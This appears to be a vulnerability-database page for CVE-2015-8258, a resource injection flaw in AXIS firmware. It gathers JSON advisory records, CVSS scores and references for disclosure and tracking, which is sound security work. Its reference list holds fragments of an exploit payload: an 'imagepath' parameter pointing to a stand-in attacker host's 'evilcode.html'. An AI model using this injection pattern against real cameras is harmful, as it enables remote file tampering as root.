  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://www.axis.com/jp/ja/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007471"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-74",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-86219"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007471"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8258"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.3,
        "url": "https://www.exploit-db.com/exploits/41625/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8258"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8258"
      },
      {
        "trust": 0.2,
        "url": "http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/74.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://www.exploit-db.com/author/?a=8225"
      },
      {
        "trust": 0.1,
        "url": "http://www.3vilh0st.com/evilcode.html\","
      },
      {
        "trust": 0.1,
        "url": "http://www.3vilh0st.com/evilcode.html\u0027);"
      },
      {
        "trust": 0.1,
        "url": "https://packetstormsecurity.com/files/author/12322/"
      },
      {
        "trust": 0.1,
        "url": "http://www.3vilh0st.com/evilcode.html\u0027,"
      },
      {
        "trust": 0.1,
        "url": "http://www.3vilh0st.com/evilcode.html\"):"
      },
      {
        "trust": 0.1,
        "url": "http://www.3vilh0st.com/evilcode.html\u0027;"
      },
      {
        "trust": 0.1,
        "url": "http://www.3vilh0st.com/evilcode.html\""
      },
      {
        "trust": 0.1,
        "url": "http://www.3vilh0st.com/evilcode.html"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-04177"
      },
      {
        "db": "VULHUB",
        "id": "VHN-86219"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-8258"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007471"
      },
      {
        "db": "PACKETSTORM",
        "id": "141672"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8258"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-529"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-04177"
      },
      {
        "db": "VULHUB",
        "id": "VHN-86219"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-8258"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007471"
      },
      {
        "db": "PACKETSTORM",
        "id": "141672"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8258"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-529"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-04-10T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-04177"
      },
      {
        "date": "2017-04-10T00:00:00",
        "db": "VULHUB",
        "id": "VHN-86219"
      },
      {
        "date": "2017-04-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-8258"
      },
      {
        "date": "2017-05-11T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007471"
      },
      {
        "date": "2017-03-17T00:04:36",
        "db": "PACKETSTORM",
        "id": "141672"
      },
      {
        "date": "2017-04-10T03:59:00.997000",
        "db": "NVD",
        "id": "CVE-2015-8258"
      },
      {
        "date": "2017-04-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201704-529"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-04-11T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-04177"
      },
      {
        "date": "2017-04-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-86219"
      },
      {
        "date": "2017-04-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2015-8258"
      },
      {
        "date": "2017-05-11T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2015-007471"
      },
      {
        "date": "2017-04-13T19:57:41.517000",
        "db": "NVD",
        "id": "CVE-2015-8258"
      },
      {
        "date": "2017-05-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201704-529"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-529"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "AXIS Communications In product firmware  root Vulnerability to modify any file as",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-007471"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "lack of information",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201704-529"
      }
    ],
    "trust": 0.6
  }
}

GSD-2015-8258

Vulnerability from gsd - Updated: 2023-12-13 01:20

Details

AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a "resource injection vulnerability."

Aliases

CVE-2015-8258

Aliases

CVE-2015-8258

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2015-8258",
    "description": "AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a \"resource injection vulnerability.\"",
    "id": "GSD-2015-8258",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2015-8258"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2015-8258"
      ],
      "details": "AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a \"resource injection vulnerability.\"",
      "id": "GSD-2015-8258",
      "modified": "2023-12-13T01:20:03.268391Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cert@cert.org",
        "ID": "CVE-2015-8258",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "AXIS Communications products with firmware through 5.80.x",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "AXIS Communications products with firmware through 5.80.x"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a \"resource injection vulnerability.\""
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "resource injection"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "41625",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/41625/"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:axis:axis_communications_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "5.80.3",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cert@cert.org",
          "ID": "CVE-2015-8258"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a \"resource injection vulnerability.\""
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-74"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "41625",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://www.exploit-db.com/exploits/41625/"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "NONE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "integrityImpact": "COMPLETE",
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:N",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 6.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.0"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      },
      "lastModifiedDate": "2017-04-13T19:57Z",
      "publishedDate": "2017-04-10T03:59Z"
    }
  }
}

FKIE_CVE-2015-8258

Vulnerability from fkie_nvd - Published: 2017-04-10 03:59 - Updated: 2025-04-20 01:37

Severity ?

7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Summary

AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a "resource injection vulnerability."

References

	URL	Tags
	cret@cert.org	https://www.exploit-db.com/exploits/41625/	Exploit, Third Party Advisory, VDB Entry
	af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/41625/	Exploit, Third Party Advisory, VDB Entry

Impacted products

	Vendor	Product	Version
	axis	axis_communications_firmware	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:axis:axis_communications_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "99204B80-D1F4-4854-8148-F9176878C2F8",
              "versionEndIncluding": "5.80.3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "AXIS Communications products with firmware through 5.80.x allow remote attackers to modify arbitrary files as root via vectors involving Open Script Editor, aka a \"resource injection vulnerability.\""
    },
    {
      "lang": "es",
      "value": "Productos de AXIS Communications con firmware hasta la versi\u00f3n 5.80.x permiten a atacantes remotos modificar archivos arbitrarios como a trav\u00e9s de vectores que involucran a Open Script Editor, tambi\u00e9n conocida como \"vulnerabilidad de inyecci\u00f3n de recursos\"."
    }
  ],
  "id": "CVE-2015-8258",
  "lastModified": "2025-04-20T01:37:25.860",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 7.8,
          "confidentialityImpact": "NONE",
          "integrityImpact": "COMPLETE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
          "version": "3.0"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-04-10T03:59:00.997",
  "references": [
    {
      "source": "cret@cert.org",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/41625/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "https://www.exploit-db.com/exploits/41625/"
    }
  ],
  "sourceIdentifier": "cret@cert.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-74"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2015-8258 (GCVE-0-2015-8258)

CNVD-2017-04177

GHSA-RH8M-WM96-4276

VAR-201704-0285

Advisory Information

Technical Details

GSD-2015-8258

FKIE_CVE-2015-8258

Tags

Sightings

Nomenclature